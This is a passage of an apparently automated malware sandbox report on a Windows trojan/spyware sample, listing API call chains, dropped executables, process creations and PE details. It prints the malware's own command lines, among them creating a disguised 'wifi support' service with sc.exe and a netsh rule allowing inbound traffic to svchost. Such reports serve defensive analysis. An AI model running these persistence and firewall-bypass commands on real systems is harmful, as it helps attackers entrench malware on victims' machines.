                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 23_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 2205.exe.4.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: D9EC.exe.4.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 5BBC.exe.4.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 1523.exe.4.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 54D0.exe.4.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 6471.exe.4.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 1523.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 1523.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 1523.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 1523.exe.4.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: 2D8F.exe.4.dr | Static PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 54D0.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 54D0.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 54D0.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 54D0.exe.4.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: 6471.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 6471.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 6471.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 6471.exe.4.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: GNXG5XLBEH.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ttfssdi
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@58/62@102/15
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: GNXG5XLBEH.exe | Virustotal: Detection: 35%
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Process created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Process created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\5BBC.exe C:\Users\user\AppData\Local\Temp\5BBC.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Process created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\6BA5.exe C:\Users\user\AppData\Local\Temp\6BA5.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\77CC.exe C:\Users\user\AppData\Local\Temp\77CC.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ceaplexz
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknownProcess created: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe"
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5BBC.exe C:\Users\user\AppData\Local\Temp\5BBC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6BA5.exe C:\Users\user\AppData\Local\Temp\6BA5.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\77CC.exe C:\Users\user\AppData\Local\Temp\77CC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ceaplexz
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5BBC.tmpJump to behavior
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419EC0 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6204:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6604
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: 0.0
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: wapejan
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: wovag
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: cbH
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: Piruvora
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: gukafipa
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: Pusazide
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: 0.0
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: wapejan
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: wovag
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: Piruvora
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: gukafipa
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: Pusazide
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCommand line argument: cbH
                      Source: 6E36.exe.4.dr, Univesity_Grade_Calculator/Form1.csCryptographic APIs: 'CreateDecryptor'
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\BackgroundTransferHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\BackgroundTransferHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: GNXG5XLBEH.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: profapi.pdb% source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbA source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.362609649.000000000549A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
